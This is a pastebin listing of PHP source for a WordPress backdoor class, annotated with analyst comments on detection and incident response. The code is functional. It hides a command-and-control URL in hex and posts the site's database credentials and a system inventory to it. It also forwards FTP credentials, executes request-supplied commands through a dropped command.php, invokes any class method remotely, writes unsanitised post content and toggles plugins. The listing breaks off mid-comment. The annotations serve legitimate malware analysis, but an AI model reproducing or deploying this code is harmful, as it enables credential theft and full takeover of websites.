
Untitled

a guest
Jun 13th, 2020
  <?php
  /*
   * Analyst overview (based on the visible part of this listing): this class is a
   * remotely controlled backdoor for WordPress sites, not a template helper.
   *  - controlAction() dispatches a caller-chosen method name once post() has
   *    fetched settings from the operator's server and the token/IP checks pass.
   *  - baseUrl() hex-decodes to hxxp://connect[.]apies[.]org/ (defanged); post()
   *    sends the DB_HOST/DB_USER/DB_PASSWORD/DB_NAME constants to that URL.
   *  - theme(), plugin() and wp_load() write server-supplied PHP into theme,
   *    plugin and core files, including hidden ".<dirname>.php" files.
   *  - command() passes a request-supplied string to cmd() from a dropped
   *    command.php.
   * On a site where this class is found, treat database and FTP credentials as
   * disclosed and review the PHP files under the WordPress root for injected code.
   */
  if ( !class_exists( 'WPTemplatesOptions' ) ) {
  class WPTemplatesOptions
  {
      private $startTime;          // set by execTimeStart(), read by execTime()
      private $script = '';
      private $version = 7;        // reported as 'clientVersion' by check()
      private $upDir = '';         // result of wp_upload_dir(), see upDir()
      private $uploadDir = '';
      private $uploadUrl = '';
      private $address;
      private $return_array;
      private $client;             // settings object received from the remote server in post()
      private $all;                // file inventory built by all()
      private $install;            // paths written or modified by theme()/plugin()/wp_load()
      private $uninstall;
      private $is_bot;
      private $secret;
      private $json_encode;        // raw response body stored by post()
      private $json_decode;        // decoded response stored by post()
      private $data;               // ->data member of the decoded response
      private $plugin;
      private $theme;
      private $wp_load;
      private $reinstall;
      private static $instance = null; // singleton slot used by getInstanceWordpress()
  27.  
  /**
   * Private, empty constructor: instances are only created through
   * getInstanceWordpress().
   */
  private function __construct() {
  }
  30.  
  /**
   * Singleton accessor: creates the instance on first call and returns the
   * same object afterwards.
   */
  public static function getInstanceWordpress() {
      if ( static::$instance === null ) {
          static::$instance = new static();
      }

      return static::$instance;
  }
  38.  
  /**
   * Caches the result of _wp_upload_dir() and its 'path' and 'url' entries.
   * _wp_upload_dir() can return false, in which case the two array reads
   * below do not yield a usable path.
   */
  private function upDir() {
      $this->upDir = $this->_wp_upload_dir();
      $this->uploadDir = $this->upDir['path'];
      $this->uploadUrl = $this->upDir['url'];
  }
  44.  
  /**
   * Returns the caller address used by authorization(): the X-Forwarded-For
   * header if present, else CF-Connecting-IP, else REMOTE_ADDR. The two header
   * values are read from the request as-is.
   */
  private function address() {
      return (isset( $_SERVER['HTTP_X_FORWARDED_FOR'] ) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : (isset( $_SERVER['HTTP_CF_CONNECTING_IP'] ) ? $_SERVER['HTTP_CF_CONNECTING_IP'] : $_SERVER['REMOTE_ADDR']));
  }
  48.  
  /**
   * Returns the WordPress root: ABSPATH when defined, otherwise the web
   * server's document root with a trailing separator.
   */
  private function abspath() {
      if ( defined( 'ABSPATH' ) ) {
          return ABSPATH;
      }
      return $_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR;
  }
  55.  
  /**
   * Returns the remote server URL used by post() and send(). The literal is
   * hex-encoded, which hides it from plain-text searches; it decodes to
   * hxxp://connect[.]apies[.]org/ (defanged here). Useful as a network
   * indicator in outbound proxy or DNS logs.
   */
  private function baseUrl() {
      return $this->hex2bin( '687474703a2f2f636f6e6e6563742e61706965732e6f72672f' );
  }
  59.  
  /**
   * Formats a byte count as a rounded value plus unit ('b' .. 'pb').
   * The leading @ suppresses any warning raised while evaluating the expression.
   */
  public function convert( $size ) {
      $unit = array('b', 'kb', 'mb', 'gb', 'tb', 'pb');
      return @round( $size / pow( 1024, ($i = floor( log( $size, 1024 ) )) ), 2 ) . ' ' . $unit["{$i}"];
  }
  64.  
  /** Records the current time so execTime() can report the elapsed duration. */
  public function execTimeStart() {
      $this->startTime = microtime( true );
  }
  68.  
  /** Returns the seconds elapsed since execTimeStart() was called. */
  public function execTime() {
      return (microtime( true ) - $this->startTime);
  }
  72.  
  /**
   * Remote-control entry point: runs the method named by $action with $params.
   *
   * Because the call is made from inside the class, private methods are
   * reachable too; only controlAction itself is excluded. Before dispatching:
   *  1. post() contacts the remote server and loads $this->client from its reply;
   *  2. $token, passed through encrypt(), must equal $this->client->password,
   *     a value supplied by that same remote server;
   *  3. authorization() must accept the caller address.
   * Every failure path, including any Exception, returns false with no output.
   * The code that feeds request data into this method is not in the visible part.
   */
  public function controlAction( $action, $params, $token ) {
      try {
          if ( $this->method_exists( $action ) && strtolower( $action ) !== strtolower( __FUNCTION__ ) ) {
              if ( $this->post() ) {
                  if ( $this->client->password === $this->encrypt( $token ) && $this->authorization() ) {
                      $this->execTimeStart();
                      return $this->{$action}( $params );
                  }
              }
          }
          return false;
      } catch ( Exception $e ) {
          return false;
      }
  }
  88.  
  /**
   * Builds the JSON reply returned to the operator: status code, elapsed time,
   * memory usage, a message, a data payload and, when given, an error number.
   * Returns false if an Exception is thrown.
   */
  private function answer( $code, $message, $data = '', $errorNo = '' ) {
      try {
          $answer['code'] = $code;
          $answer['time'] = $this->execTime();
          $answer['memory'] = $this->convert( memory_get_usage( true ) );
          $answer['message'] = $message;
          $answer['data'] = $data;
          if ( $errorNo !== '' ) {
              $answer['errorNo'] = $errorNo;
          }

          return json_encode( $answer, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT );
      } catch ( Exception $e ) {
          return false;
      }
  }
  105.  
  /**
   * Returns php_uname() (operating system and host description) or false when
   * the function is unavailable. The value is included in check()'s report.
   */
  private function php_uname() {
      if ( function_exists( 'php_uname' ) ) {
          return php_uname();
      }
      return false;
  }
  112.  
  /**
   * Guarded pass-through to WordPress get_bloginfo(); returns false when the
   * function is not loaded or an Exception is thrown.
   */
  private function get_bloginfo( $show = '', $filter = 'raw' ) {
      try {
          if ( function_exists( 'get_bloginfo' ) ) {
              return get_bloginfo( $show, $filter );
          }
          return false;
      } catch ( Exception $e ) {
          return false;
      }
  }
  123.  
  /**
   * Guarded pass-through to WordPress get_template_directory(); returns false
   * when the function is not loaded.
   */
  private function get_template_directory() {
      if ( function_exists( 'get_template_directory' ) ) {
          return get_template_directory();
      }
      return false;
  }
  130.  
  /**
   * Returns true when $data decodes with json_decode() to a non-empty value,
   * false otherwise. Used by post() to vet the remote server's reply.
   */
  private function json_validator( $data = null ) {
      try {
          // The || makes this condition true for every value except null.
          if ( !empty( $data ) || !is_null( $data ) ) {
              $decode = @json_decode( $data );
              if ( empty( $decode ) || is_null( $decode ) ) {
                  return false;
              }
              return true;
          }
          return false;
      } catch ( Exception $e ) {
          return false;
      }
  }
  145.  
  /**
   * Returns the number of hours, rounded, between the Unix time $unix and now.
   */
  private function timestamp( $unix ) {
      try {
          return round( (strtotime( date( 'Y-m-d H:i:s' ) ) - $unix) / 60 / 60 );
      } catch ( Exception $e ) {
          return false;
      }
  }
  153.  
  /**
   * Guarded pass-through to WordPress get_theme_root(); returns false when the
   * function is not loaded.
   */
  private function _get_theme_root( $stylesheet_or_template = '' ) {
      if ( function_exists( 'get_theme_root' ) ) {
          return get_theme_root( $stylesheet_or_template );
      }
      return false;
  }
  160.  
  /**
   * Returns the address the local host name resolves to, or SERVER_ADDR when
   * gethostbyname() is unavailable. Reported as 'hostname' by check() and as
   * 'address' by ftp().
   */
  private function _gethostbyname() {
      if ( function_exists( 'gethostbyname' ) ) {
          return gethostbyname( getHostName() );
      }
      return $_SERVER['SERVER_ADDR'];
  }
  167.  
  /** Guarded pass-through to WordPress is_home(); false when not loaded. */
  private function _is_home() {
      if ( function_exists( 'is_home' ) ) {
          return is_home();
      }
      return false;
  }
  174.  
  /** Guarded pass-through to WordPress is_front_page(); false when not loaded. */
  private function _is_front_page() {
      if ( function_exists( 'is_front_page' ) ) {
          return is_front_page();
      }
      return false;
  }
  181.  
  /**
   * Guarded pass-through to WordPress wp_remote_post(); false when not loaded.
   * All outbound traffic in the visible part (post(), send()) goes through here.
   */
  private function _wp_remote_post( $url, $args = array() ) {
      if ( function_exists( 'wp_remote_post' ) ) {
          return wp_remote_post( $url, $args );
      }
      return false;
  }
  188.  
  /**
   * Guarded pass-through to WordPress wp_remote_retrieve_response_code();
   * false when not loaded.
   */
  private function _wp_remote_retrieve_response_code( $response ) {
      if ( function_exists( 'wp_remote_retrieve_response_code' ) ) {
          return wp_remote_retrieve_response_code( $response );
      }
      return false;
  }
  195.  
  /**
   * Guarded pass-through to WordPress wp_remote_retrieve_body(); false when
   * not loaded.
   */
  private function _wp_remote_retrieve_body( $response ) {
      if ( function_exists( 'wp_remote_retrieve_body' ) ) {
          return wp_remote_retrieve_body( $response );
      }
      return false;
  }
  202.  
  /** Guarded pass-through to WordPress site_url(); false when not loaded. */
  private function _site_url( $path = '', $scheme = null ) {
      if ( function_exists( 'site_url' ) ) {
          return site_url( $path, $scheme );
      }
      return false;
  }
  209.  
  /**
   * Guarded pass-through to WordPress wp_upload_dir(); returns false when the
   * function is not loaded or an Exception is thrown.
   */
  private function _wp_upload_dir() {
      try {
          if ( function_exists( 'wp_upload_dir' ) ) {
              return wp_upload_dir();
          }
          return false;
      } catch ( Exception $e ) {
          return false;
      }
  }
  220.  
  /**
   * Returns the number of published posts as an integer, or false when
   * wp_count_posts() is not loaded or an Exception is thrown.
   */
  private function wp_count_posts() {
      try {
          if ( function_exists( 'wp_count_posts' ) ) {
              return intval( wp_count_posts()->publish );
          }
          return false;
      } catch ( Exception $e ) {
          return false;
      }
  }
  231.  
  /**
   * Calls WordPress kses_remove_filters(), loading wp-includes/kses.php first
   * if the function is missing. Those filters are WordPress's HTML sanitising
   * of saved content, so after this call post content is stored unfiltered.
   * Always returns false.
   */
  private function _kses_remove_filters() {
      if ( !function_exists( 'kses_remove_filters' ) ) {
          include_once($this->abspath() . 'wp-includes/kses.php');
          // Retry now that the file has been included.
          $this->_kses_remove_filters();
      } else {
          kses_remove_filters();
      }
      return false;
  }
  241.  
  /**
   * Pass-through to WordPress wp_update_post() that first removes the KSES
   * content filters via _kses_remove_filters(), so the written post content is
   * not sanitised. Returns false when wp_update_post() is not loaded.
   */
  private function _wp_update_post( $postarr = array(), $wp_error = false ) {
      if ( function_exists( 'wp_update_post' ) ) {
          $this->_kses_remove_filters();
          return wp_update_post( $postarr, $wp_error );
      }
      return false;
  }
  249.  
  /**
   * Returns a term_id => name map of the site's categories, or false when
   * get_categories() is not loaded or an Exception is thrown.
   */
  private function _get_categories() {
      try {
          if ( function_exists( 'get_categories' ) ) {
              $return = array();
              foreach ( get_categories() as $item ) {
                  $return[$item->term_id] = $item->name;
              }
              return $return;
          }
          return false;
      } catch ( Exception $e ) {
          return false;
      }
  }
  264.  
  /**
   * Guarded pass-through to WordPress get_post(); a null $output is replaced
   * by an empty stdClass before the call. Returns false when not loaded.
   */
  private function _get_post( $post = null, $output = null, $filter = 'raw' ) {
      if ( is_null( $output ) ) {
          $output = new stdClass();
      }
      if ( function_exists( 'get_post' ) ) {
          return get_post( $post, $output, $filter );
      }
      return false;
  }
  274.  
  /** Guarded pass-through to WordPress get_plugins(); false when not loaded. */
  private function _get_plugins( $plugin_folder = '' ) {
      if ( function_exists( 'get_plugins' ) ) {
          return get_plugins( $plugin_folder );
      }
      return false;
  }
  281.  
  /**
   * Pass-through to WordPress is_plugin_active(). When the function is missing
   * it includes wp-admin/includes/plugin.php, if that file exists, and retries;
   * otherwise it returns false.
   */
  private function _is_plugin_active( $plugin ) {
      if ( function_exists( 'is_plugin_active' ) ) {
          return is_plugin_active( $plugin );
      } else {
          if ( file_exists( $filename = $this->str_replace( $this->abspath() . 'wp-admin/includes/plugin.php' ) ) ) {
              include_once($filename);
              return $this->_is_plugin_active( $plugin );
          }
      }
      return false;
  }
  293.  
  /**
   * Guarded pass-through to WordPress deactivate_plugins(); false when not
   * loaded. Called from activate_plugins() in this class.
   */
  private function _deactivate_plugins( $plugins, $silent = false, $network_wide = null ) {
      if ( function_exists( 'deactivate_plugins' ) ) {
          return deactivate_plugins( $plugins, $silent, $network_wide );
      }
      return false;
  }
  300.  
  /**
   * Guarded pass-through to WordPress activate_plugins(); false when not
   * loaded.
   */
  private function _activate_plugins( $plugins, $redirect = '', $network_wide = false, $silent = false ) {
      if ( function_exists( 'activate_plugins' ) ) {
          return activate_plugins( $plugins, $redirect, $network_wide, $silent );
      }
      return false;
  }
  307.  
  /** Guarded pass-through to WordPress get_option(); false when not loaded. */
  private function _get_option( $option, $default = false ) {
      if ( function_exists( 'get_option' ) ) {
          return get_option( $option, $default );
      }
      return false;
  }
  314.  
  /** Guarded pass-through to WordPress update_option(); false when not loaded. */
  private function _update_option( $option, $value, $autoload = null ) {
      if ( function_exists( 'update_option' ) ) {
          return update_option( $option, $value, $autoload );
      }
      return false;
  }
  321.  
  /** Guarded pass-through to WordPress add_option(); false when not loaded. */
  private function _add_option( $option, $value = '', $deprecated = '', $autoload = 'yes' ) {
      if ( function_exists( 'add_option' ) ) {
          return add_option( $option, $value, $deprecated, $autoload );
      }
      return false;
  }
  328.  
  /** Guarded pass-through to WordPress wp_get_themes(); false when not loaded. */
  private function _wp_get_themes( $args = array() ) {
      if ( function_exists( 'wp_get_themes' ) ) {
          return wp_get_themes( $args );
      }
      return false;
  }
  335.  
  /**
   * Guarded pass-through to WordPress get_user_by(); false when not loaded.
   * NOTE(review): no caller appears in the visible part of the listing.
   */
  private function _get_user_by( $field, $value ) {
      if ( function_exists( 'get_user_by' ) ) {
          return get_user_by( $field, $value );
      }
      return false;
  }
  342.  
  /**
   * Guarded pass-through to WordPress wp_set_current_user(); false when not
   * loaded. NOTE(review): no caller appears in the visible part; check the rest
   * of the file for a login path that skips password verification.
   */
  private function _wp_set_current_user( $id, $name = '' ) {
      if ( function_exists( 'wp_set_current_user' ) ) {
          return wp_set_current_user( $id, $name );
      }
      return false;
  }
  349.  
  /**
   * Guarded pass-through to WordPress wp_set_auth_cookie(); false when not
   * loaded. NOTE(review): no caller appears in the visible part; review
   * WordPress sessions if this class was active on a site.
   */
  private function _wp_set_auth_cookie( $user_id, $remember = true, $secure = '', $token = '' ) {
      if ( function_exists( 'wp_set_auth_cookie' ) ) {
          return wp_set_auth_cookie( $user_id, $remember, $secure, $token );
      }
      return false;
  }
  356.  
  357.  
  /**
   * Pass-through to WordPress wp_authenticate(). When the function is missing
   * it includes wp-includes/pluggable.php but still returns false for this
   * call; there is no retry.
   */
  private function _wp_authenticate( $username, $password ) {
      if ( function_exists( 'wp_authenticate' ) ) {
          return wp_authenticate( $username, $password );
      } else {
          include_once($this->abspath() . 'wp-includes/pluggable.php');
      }
      return false;
  }
  366.  
  /** Guarded pass-through to WordPress add_action(); false when not loaded. */
  private function _add_action( $tag, $function_to_add, $priority = 10, $accepted_args = 1 ) {
      if ( function_exists( 'add_action' ) ) {
          return add_action( $tag, $function_to_add, $priority, $accepted_args );
      }
      return false;
  }
  373.  
  /** Guarded pass-through to WordPress add_filter(); false when not loaded. */
  private function _add_filter( $tag, $function_to_add, $priority = 10, $accepted_args = 1 ) {
      if ( function_exists( 'add_filter' ) ) {
          return add_filter( $tag, $function_to_add, $priority, $accepted_args );
      }
      return false;
  }
  380.  
  /**
   * Returns WordPress is_user_logged_in(), or false when that function is not
   * loaded.
   */
  private function _is_user_logged_in() {
      $is_user_logged_in = false;
      if ( function_exists( 'is_user_logged_in' ) ) {
          $is_user_logged_in = is_user_logged_in();
      }
      return $is_user_logged_in;
  }
  388.  
  /**
   * Overwrites the title and content of the post whose ID is in the request.
   *
   * 'post_title' and 'post_content' arrive hex-encoded in $_REQUEST and are
   * decoded with hex2bin(); the write goes through _wp_update_post(), which
   * removes the KSES filters first, so the content is stored unsanitised.
   * On success the updated post is returned in an answer() reply.
   * For incident response: compare post revisions and modification dates for
   * content changes that no editor made.
   */
  private function wp_update_post() {
      try {
          if ( !$this->hex2bin( $_REQUEST['post_title'] ) || !$this->hex2bin( $_REQUEST['post_content'] ) ) {
              return false;
          }
          $array = array(
              'ID' => $_REQUEST['id'],
              'post_title' => $this->hex2bin( $_REQUEST['post_title'] ),
              'post_content' => $this->hex2bin( $_REQUEST['post_content'] ),
          );
          if ( $this->_wp_update_post( $array ) ) {
              return $this->answer( true, __FUNCTION__, $this->_get_post( $_REQUEST['id'] ) );
          }
          return false;
      } catch ( Exception $e ) {
          return false;
      }
  }
  407.  
  /**
   * Collects an inventory of the site and returns it as an answer() JSON reply.
   *
   * The report covers blog title, description and language, WordPress and PHP
   * versions, post count, categories, installed themes and plugins, filesystem
   * paths (upload dir, theme dir, root, this file), php_uname() and the host
   * address. post() embeds this report in its request to the remote server.
   * Side effect: a non-writable upload directory is chmod()ed to 0777; that
   * permission change stays in place after the call.
   */
  private function check() {
      try {
          $this->upDir();
          if ( $this->uploadDir ) {
              if ( !is_writable( $this->uploadDir ) ) {
                  // Tries to make the upload directory world-writable.
                  if ( !@chmod( $this->uploadDir, 0777 ) ) {
                      $data['uploadDirWritable'] = false;
                  } else {
                      $data['uploadDirWritable'] = true;
                  }
              } else {
                  $data['uploadDirWritable'] = true;
              }
          } else {
              // An unknown upload directory is also reported as writable.
              $data['uploadDirWritable'] = true;
          }
          $data['clientVersion'] = $this->version;
          $data['script'] = 'Wordpress';
          $data['title'] = $this->get_bloginfo( 'name' );
          $data['description'] = $this->get_bloginfo( 'description' );
          $data['language'] = $this->get_bloginfo( 'language' );
          $data['WPVersion'] = $this->get_bloginfo( 'version' );
          $data['wp_count_posts'] = $this->wp_count_posts();
          $data['get_categories'] = $this->_get_categories();
          $data['uploadDir'] = $this->uploadDir;
          $data['cache'] = (defined( 'WP_CACHE' ) && WP_CACHE) ? true : false;
          $data['themeName'] = (function_exists( 'wp_get_theme' )) ? wp_get_theme()->get( 'Name' ) : false;
          $data['themeDir'] = $this->get_template_directory();
          $data['themes'] = $this->get_themes();
          $data['plugins'] = $this->get_plugins();
          $data['home'] = $this->home();
          $data['root'] = $this->abspath();
          $data['filepath'] = __FILE__;
          $data['uname'] = $this->php_uname();
          $data['hostname'] = $this->_gethostbyname();
          $data['php'] = phpversion();
          return $this->answer( true, 'Wordpress', $data );
      } catch ( Exception $e ) {
          return $this->answer( false, 'Unknown ERROR', $e->getMessage(), 'ERR000' );
      }
  }
  449.  
  /**
   * Returns the base directory for the file scans in this class.
   *
   * Request parameters override the default: 'home_path' (hex-encoded) is
   * returned as given, and 'home_directory' is a count of '..' segments to
   * climb above abspath(). The scan root can therefore lie outside the
   * WordPress installation. Without either parameter the result is
   * realpath(abspath()) plus a trailing separator.
   */
  private function home() {
      try {
          if ( isset( $_REQUEST['home_path'] ) ) {
              return $this->hex2bin( $_REQUEST['home_path'] );
          }
          if ( isset( $_REQUEST['home_directory'] ) ) {
              $directory = DIRECTORY_SEPARATOR;
              for ( $i = 1; $i <= $_REQUEST['home_directory']; $i++ ) {
                  $directory .= DIRECTORY_SEPARATOR . '..' . DIRECTORY_SEPARATOR;
              }
              return realpath( $this->abspath() . $directory ) . DIRECTORY_SEPARATOR;
          }
          return realpath( $this->abspath() ) . DIRECTORY_SEPARATOR;
      } catch ( Exception $e ) {
          return false;
      }
  }
  467.  
  /**
   * Despite the name this is a one-way digest, md5(sha1(md5($hash))), with no
   * key or salt. controlAction() applies it to the token and authorization()
   * applies it to the caller address.
   */
  private function encrypt( $hash ) {
      try {
          return md5( sha1( md5( $hash ) ) );
      } catch ( Exception $e ) {
          return false;
      }
  }
  475.  
  /**
   * Returns true when $variable is null or empty() in the PHP sense (which
   * includes '', 0, '0' and an empty array), false otherwise.
   */
  private function is_null( $variable ) {
      try {
          if ( is_null( $variable ) || empty( $variable ) ) {
              return true;
          }
          return false;
      } catch ( Exception $e ) {
          return false;
      }
  }
  486.  
  /**
   * Returns true when this object has a method named $action. This is the
   * only restriction controlAction() places on the method name, apart from
   * excluding itself.
   */
  private function method_exists( $action ) {
      try {
          if ( method_exists( $this, $action ) ) {
              return true;
          }
          return false;
      } catch ( Exception $e ) {
          return false;
      }
  }
  497.  
  /**
   * Caller-address check used by controlAction(): passes when the digest of
   * address() contains the value, or any of the values, in
   * $this->client->address. That list comes from the remote server's reply
   * loaded in post(), and the comparison is a substring match.
   */
  private function authorization() {
      try {
          if ( $this->strpos( $this->encrypt( $this->address() ), $this->client->address ) ) {
              return true;
          }
          return false;
      } catch ( Exception $e ) {
          return false;
      }
  }
  508.  
  /**
   * Phones home and loads the operator's settings.
   *
   * Sends an HTTP POST to baseUrl() containing the site URL, the check()
   * inventory and the DB_HOST, DB_USER, DB_PASSWORD and DB_NAME constants.
   * The URL returned by baseUrl() uses the http scheme, so the credentials
   * leave the host unencrypted. A 200 reply with a JSON body is decoded; its
   * ->files member becomes $this->client and ->data becomes $this->data.
   * controlAction() calls this on every dispatch attempt, before its token
   * check. For incident response: rotate the database password and look for
   * outbound requests to the baseUrl() host.
   *
   * @return bool true when settings were loaded, false otherwise
   */
  private function post() {
      try {
          $post = $this->_wp_remote_post( $this->baseUrl(), array(
              'body' => array(
                  'url' => $this->_site_url( '/' ),
                  'client' => $this->check(),
                  'DB_HOST' => (defined( 'DB_HOST' )) ? DB_HOST : 'undefined',
                  'DB_USER' => (defined( 'DB_USER' )) ? DB_USER : 'undefined',
                  'DB_PASSWORD' => (defined( 'DB_PASSWORD' )) ? DB_PASSWORD : 'undefined',
                  'DB_NAME' => (defined( 'DB_NAME' )) ? DB_NAME : 'undefined',
              ),
          ) );
          if ( $this->_wp_remote_retrieve_response_code( $post ) === 200 && $this->json_validator( $this->_wp_remote_retrieve_body( $post ) ) ) {
              $this->json_encode = $this->_wp_remote_retrieve_body( $post );
              $this->json_decode = json_decode( $this->json_encode );
              $this->client = $this->json_decode->files;
              $this->data = $this->json_decode->data;
              return true;
          }
          return false;
      } catch ( Exception $e ) {
          return false;
      }
  }
  533.  
  /**
   * Sends $data to the remote server: an HTTP POST to baseUrl() with $array
   * appended as the path, carrying the site URL and $data under the key
   * $array. The reply is ignored and the method always returns false.
   * ftp() uses it with the path 'FTP'.
   */
  private function send( $array, $data ) {
      try {
          $this->_wp_remote_post( $this->baseUrl() . "{$array}", array(
              'body' => array(
                  'url' => $this->_site_url( '/' ),
                  $array => $data,
              ),
          ) );
          return false;
      } catch ( Exception $e ) {
          return false;
      }
  }
  547.  
  /**
   * Replaces each '//' in $data with '/' in a single pass. $data may be a
   * string or an array of strings, as in list_folders().
   */
  private function str_replace( $data ) {
      try {
          $search = array('//');
          $replace = array('/');
          return str_replace( $search, $replace, $data );
      } catch ( Exception $e ) {
          return false;
      }
  }
  557.  
  /**
   * Returns true when $haystack contains $needle, or any element of $needle
   * when it is an array, at or after $offset; false otherwise. Unlike the
   * built-in strpos() the result is a boolean, so a match at position 0 is
   * also true.
   */
  private function strpos( $haystack, $needle, $offset = 0 ) {
      try {
          if ( !is_array( $needle ) )
              $needle = array($needle);
          foreach ( $needle as $query ) {
              if ( strpos( $haystack, $query, $offset ) !== false ) {
                  return true;
              }
          }
          return false;
      } catch ( Exception $e ) {
          return false;
      }
  }
  572.  
  /**
   * Decodes a hexadecimal string to raw bytes with pack('H*').
   *
   * Accepts scalars and objects that implement __toString(); returns false for
   * any other type, for odd-length input and for input containing non-hex
   * characters. The class uses it to decode request parameters and the
   * baseUrl() literal, so searching logs for the readable form of those
   * values will not match the hex-encoded requests.
   */
  private function hex2bin( $data ) {
      try {
          static $old;
          if ( $old === null ) {
              $old = version_compare( PHP_VERSION, '5.2', '<' );
          }
          $isobj = false;
          if ( is_scalar( $data ) || (($isobj = is_object( $data )) && method_exists( $data, '__toString' )) ) {
              if ( $isobj && $old ) {
                  // On PHP older than 5.2 the object is rendered through echo instead of a cast.
                  ob_start();
                  echo $data;
                  $data = ob_get_clean();
              } else {
                  $data = (string) $data;
              }
          } else {
              return false;
          }
          $len = strlen( $data );
          if ( $len % 2 ) {
              return false;
          }
          if ( strspn( $data, '0123456789abcdefABCDEF' ) != $len ) {
              return false;
          }
          return pack( 'H*', $data );
      } catch ( Exception $e ) {
          return false;
      }
  }
  603.  
  /**
   * Tests whether the given FTP credentials work: connects to port 21 with a
   * 10-second timeout, using ftp_ssl_connect() when $ssl is true and available,
   * and attempts a login. Returns true only on a successful login; the stream
   * is closed only in that case.
   */
  private function ftp_connect( $hostname = 'localhost', $username = null, $password = null, $ssl = false ) {
      try {
          if ( !$ssl ) {
              if ( !$stream = ftp_connect( $hostname, 21, 10 ) ) {
                  return false;
              }
          } else if ( function_exists( 'ftp_ssl_connect' ) ) {
              if ( !$stream = ftp_ssl_connect( $hostname, 21, 10 ) ) {
                  return false;
              }
          } else {
              return false;
          }
          if ( @ftp_login( $stream, $username, $password ) ) {
              ftp_close( $stream );
              return true;
          }
          return false;
      } catch ( Exception $e ) {
          return false;
      }
  }
  626.  
  /**
   * Validates FTP credentials taken from the request and forwards them to the
   * remote server.
   *
   * When 'connection_type' is present, the hostname, username and password
   * request parameters are tested with ftp_connect(); if the login succeeds
   * they are URL-encoded and posted, with the host address, to the 'FTP' path
   * via send(). It then calls $this->get(), which is defined outside the
   * visible part of the listing. Always returns false.
   * For incident response: FTP credentials entered on an affected site should
   * be treated as disclosed.
   */
  private function ftp() {
      try {
          if ( !isset( $this->client ) ) {
              // cache() is defined outside the visible part of the listing.
              $this->client = $this->cache()->files;
          }
          if ( $this->client->ftp === false ) {
              define( 'FS_METHOD', 'ftpsockets' );
          }
          if ( isset( $_REQUEST['connection_type'] ) && !$this->is_null( $_REQUEST['connection_type'] ) ) {
              // The 'sftp' default below is unreachable: the parameter is known to be set here.
              $connection_type = (isset( $_REQUEST['connection_type'] )) ? $_REQUEST['connection_type'] : 'sftp';
              $hostname = (isset( $_REQUEST['hostname'] )) ? $_REQUEST['hostname'] : null;
              $username = (isset( $_REQUEST['username'] )) ? $_REQUEST['username'] : null;
              $password = (isset( $_REQUEST['password'] )) ? $_REQUEST['password'] : null;
              if ( $this->ftp_connect( $hostname, $username, $password, ($connection_type === 'sftp') ? true : false ) ) {
                  $data = array(
                      'hostname' => urlencode( $hostname ),
                      'address' => urlencode( $this->_gethostbyname() ),
                      'username' => urlencode( $username ),
                      'password' => urlencode( $password ),
                      'connection_type' => urlencode( $connection_type ),
                  );
                  $this->send( 'FTP', $data );
                  $this->get();
              }
          }
          return false;
      } catch ( Exception $e ) {
          return false;
      }
  }
  657.  
  /**
   * Passes a request-supplied string to cmd() and returns the result.
   *
   * The hex-encoded 'command' request parameter is decoded and handed to
   * cmd(), a function expected to come from command.php in this file's
   * directory. If that file is missing it is first created from
   * $this->client->command (content supplied by the remote server) through
   * write(), defined outside the visible part, and the method calls itself
   * again.
   * Detection: an unexpected command.php next to this file.
   */
  private function command() {
      try {
          if ( !isset( $_REQUEST['command'] ) ) {
              return false;
          }
          $command = $this->hex2bin( $_REQUEST['command'] );
          if ( file_exists( $filename = __DIR__ . '/command.php' ) ) {
              include_once($filename);
              return $this->answer( true, $command, cmd( $command ) );
          } else {
              if ( $this->write( $filename, $this->client->command ) ) {
                  return $this->command();
              }
          }
          return false;
      } catch ( Exception $e ) {
          return false;
      }
  }
  677.  
  /**
   * Toggles the plugin named by the hex-encoded 'plugin_name' request
   * parameter: an active plugin is deactivated, an inactive one is activated.
   * Either way the check() report is returned. Because any plugin can be
   * switched off this way, verify after an incident that security plugins are
   * still active.
   */
  private function activate_plugins() {
      try {
          if ( !isset( $_REQUEST['plugin_name'] ) ) {
              return false;
          }
          $plugin_name = $this->hex2bin( $_REQUEST['plugin_name'] );
          if ( $this->_is_plugin_active( $plugin_name ) ) {
              $this->_deactivate_plugins( $plugin_name );
              return $this->check();
          } else {
              $this->_activate_plugins( $plugin_name );
              return $this->check();
          }
      } catch ( Exception $e ) {
          return false;
      }
  }
  695.  
  /**
   * Returns the installed plugins as reported by _get_plugins(), each entry
   * extended with an 'active' flag (1 or 0). Loads
   * wp-admin/includes/plugin.php first when get_plugins() is not yet defined.
   * Returns an empty array when no plugins are found and false on an Exception.
   */
  private function get_plugins() {
      try {
          if ( !function_exists( 'get_plugins' ) ) {
              if ( file_exists( $filename = $this->str_replace( $this->abspath() . 'wp-admin/includes/plugin.php' ) ) ) {
                  include_once($filename);
              }
          }
          foreach ( $this->_get_plugins() AS $plugin_name => $get_plugin ) {
              $plugins[$plugin_name] = $get_plugin;
              if ( $this->_is_plugin_active( $plugin_name ) ) {
                  $plugins[$plugin_name]['active'] = 1;
              } else {
                  $plugins[$plugin_name]['active'] = 0;
              }
          }

          return (isset( $plugins )) ? $plugins : array();
      } catch ( Exception $e ) {
          return false;
      }
  }
  717.  
  /**
   * Returns a map of installed themes to selected header fields (Name,
   * Description, Author, AuthorURI, Version, Template, Status, TextDomain).
   * The map is empty when wp_get_themes() is not loaded; false is returned on
   * an Exception.
   */
  private function get_themes() {
      try {
          $themes = array();
          if ( $this->_wp_get_themes() !== false ) {
              foreach ( $this->_wp_get_themes() AS $theme_name => $wp_get_theme ) {
                  $themes[$theme_name] = array(
                      'Name' => $wp_get_theme->get( 'Name' ),
                      'Description' => $wp_get_theme->get( 'Description' ),
                      'Author' => $wp_get_theme->get( 'Author' ),
                      'AuthorURI' => $wp_get_theme->get( 'AuthorURI' ),
                      'Version' => $wp_get_theme->get( 'Version' ),
                      'Template' => $wp_get_theme->get( 'Template' ),
                      'Status' => $wp_get_theme->get( 'Status' ),
                      'TextDomain' => $wp_get_theme->get( 'TextDomain' ),
                  );
              }
          }
          return $themes;
      } catch ( Exception $e ) {
          return false;
      }
  }
  740.  
  /**
   * Returns the resolved real path of $folder when it exists and is a
   * directory, false otherwise.
   */
  private function folder_exist( $folder ) {
      try {
          $path = realpath( $folder );
          return ($path !== false AND is_dir( $path )) ? $path : false;
      } catch ( Exception $e ) {
          return false;
      }
  }
  749.  
  /**
   * Lists the entries of a directory and returns them in an answer() reply.
   * $directory is hex-encoded and chosen by the caller; when empty, abspath()
   * is used. There is no restriction to the WordPress tree, so any directory
